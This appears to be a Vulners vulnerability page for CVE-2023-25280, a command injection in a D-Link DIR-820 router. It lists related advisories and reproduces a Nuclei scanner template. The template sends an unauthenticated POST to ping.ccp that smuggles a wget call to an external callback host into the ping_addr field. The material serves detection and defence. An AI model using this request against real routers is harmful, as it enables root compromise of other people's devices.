| Reporter | Title | Published | Views | Family All 17 |
|---|---|---|---|---|
| CVE-2023-25280 | 16 Mar 202300:00 | – | attackerkb | |
| The vulnerability of the ping.ccp component of the D-Link DIR820LA1 router’s microprogramming software allows a hacker to execute arbitrary commands. | 20 Apr 202300:00 | – | bdu_fstec | |
| CVE-2023-25280 | 16 Mar 202306:30 | – | circl | |
| D-Link DIR-820 Router OS Command Injection Vulnerability | 30 Sep 202400:00 | – | cisa_kev | |
| CISA Adds Four Known Exploited Vulnerabilities to Catalog | 8 Nov 202412:00 | – | cisa | |
| D-Link DIR820LA1 操作系统命令注入漏洞 | 16 Mar 202300:00 | – | cnnvd | |
| CVE-2023-25280 | 16 Mar 202300:00 | – | cve | |
| CVE-2023-25280 | 16 Mar 202300:00 | – | cvelist | |
| D-Link DIR-820 Devices Command Injection (CVE-2023-25280) | 7 Jul 202500:00 | – | nessus | |
| CVE-2023-25280 | 16 Mar 202301:15 | – | nvd |
id: CVE-2023-25280
info:
name: D-Link DIR820LA1_FW105B03 'ping_addr' - OS Command Injection
author: pussycat0x
severity: critical
description: |
OS Command injection vulnerability in D-Link DIR820LA1_FW105B03 allows attackers to escalate privileges to root via a crafted payload with the ping_addr parameter to ping.ccp.
impact: |
Unauthenticated attackers can execute arbitrary OS commands with root privileges on the D-Link DIR820LA1 router, leading to complete device compromise and network takeover.
remediation: |
Upgrade to the latest firmware version from D-Link or replace the affected device with a patched model.
reference:
- https://github.com/migraine-sudo/D_Link_Vuln/tree/main/cmd%20Inject%20in%20pingV4Msg
- https://www.dlink.com/en/security-bulletin/
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2023-25280
cwe-id: CWE-78
epss-score: 0.98053
epss-percentile: 0.99904
cpe: cpe:2.3:o:dlink:dir820la1_firmware:105b03:*:*:*:*:*:*:*
metadata:
vendor: dlink
product: dir820la1_firmware
tags: cve,cve2023,rce,unauth,kev,dlink,vkev,vuln
variables:
payload: "wget http://{{interactsh-url}}"
flow: http(1) && http(2)
http:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- "status_code == 200"
- "contains(body, 'D-LINK')"
condition: and
internal: true
- raw:
- |
POST /ping.ccp HTTP/1.1
Host: {{Hostname}}
Accept: application/xml, text/xml, */*; q=0.01
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded
Origin: {{RootURL}}
Referer: {{RootURL}}/lan.asp
Cookie: hasLogin=1
ccp_act=pingV4Msg&ping_addr=%0a{{payload}}%0a
matchers:
- type: dsl
dsl:
- "contains(interactsh_protocol, 'http')"
- "status_code == 200"
condition: and
# digest: 4a0a00473045022028aec1a4d25ddcbdbd9e53caadd73bbc7f095576da7d257c34268f78a50cad4f0221009d6ad64e2cdccb33be62428c98488da14d72d7ff9e99d82f7980e8a1e45b6e34:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation